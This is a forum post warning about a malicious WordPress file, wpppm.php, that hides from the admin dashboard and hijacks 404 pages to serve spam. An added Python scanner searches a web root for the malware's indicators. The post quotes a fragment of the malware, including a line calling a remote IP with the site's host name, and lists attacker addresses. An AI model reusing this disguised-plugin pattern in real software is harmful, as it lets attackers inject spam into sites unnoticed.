Watch out for malicious "plugin" wpppm

Todd Z
ToddZ
Encino, CA
I just tracked this down in a client's site.

While no plugin shows in the admin dashboard, in the plugin dir there's a wpppm/wpppm.php file (and a related subdir filled with files with random hash filenames). The way it works is it overrides the normal 404 behavior of your site and serves up a spam ad page for any URL that isn't otherwise a valid page, like yoursite.com/sdlfkjsldfkjsdflkjsdfs

The file starts with:
/*
Plugin Name: Wordpress Plugin Manager
*/

function fourofour()
{

...
$u = "http://... 83.133.123.174/v.html?v=$ver&h=" . urlencode($_SERVER['HTTP_HOST']);


(I "broke" the URL above so it wouldn't be a valid link)

So most people would think it's a standard WP file, but notice the name of the function: fourofour = 404

If you enter that url into your browser you get (at least I did) 91.207.60.62
and if you enter that into your browser you get the "HYDROXYCITRIC" spam page that will be injected into your site.

You might want to block those addresses in your firewall and search your servers for this wpppm.php.

After the fact, I found this article on it: http://blog.sucuri.ne...

Interestingly, if you Google wpppm.php you'll find about 6,500 sites infected by this!

Good luck,
todd at toddzebert dot com
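
The server search suggested in the post, as an added example that is not part of the original post: a Python scan of a web root for the file name, plugin header, function name and the two IP addresses quoted above. The function names `scan` and `build_sample_tree` and the sample files are constructed for illustration.

```python
import os
import re
import sys

# Indicators quoted in the post above. File contents are matched as bytes.
INDICATORS = {
    "header": re.compile(rb"Plugin Name:\s*Wordpress Plugin Manager", re.I),
    "function": re.compile(rb"function\s+fourofour\s*\(", re.I),
    "ip": re.compile(rb"(?<![\d.])(?:83\.133\.123\.174|91\.207\.60\.62)(?![\d.])"),
}
MAX_BYTES = 1 << 20  # cap the read at 1 MiB per file


def scan(root):
    """Return {path: [indicator names]} for .php files under root."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            found = ["filename"] if name.lower() == "wpppm.php" else []
            try:
                with open(path, "rb") as fh:
                    data = fh.read(MAX_BYTES)
            except OSError:
                data = b""  # unreadable: a filename match is still reported
            found += [k for k, rx in INDICATORS.items() if rx.search(data)]
            if found:
                hits[path] = found
    return hits


def build_sample_tree(base):
    """Constructed sample data: one file shaped like the excerpt, one benign plugin."""
    samples = {
        "wpppm/wpppm.php": b"<?php\n/*\nPlugin Name: Wordpress Plugin Manager\n*/\n"
                           b"function fourofour()\n{\n}\n",
        "hello/hello.php": b"<?php\n/*\nPlugin Name: Hello Dolly\n*/\n",
    }
    for rel, body in samples.items():
        path = os.path.join(base, "wp-content", "plugins", *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)


if __name__ == "__main__":
    # Usage: python scan_wpppm.py /var/www  (the path is an example)
    for path, found in sorted(scan(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, ",".join(found))
```

Because the plugin does not show in the admin dashboard, the scan reads the filesystem directly instead of relying on WordPress's plugin list.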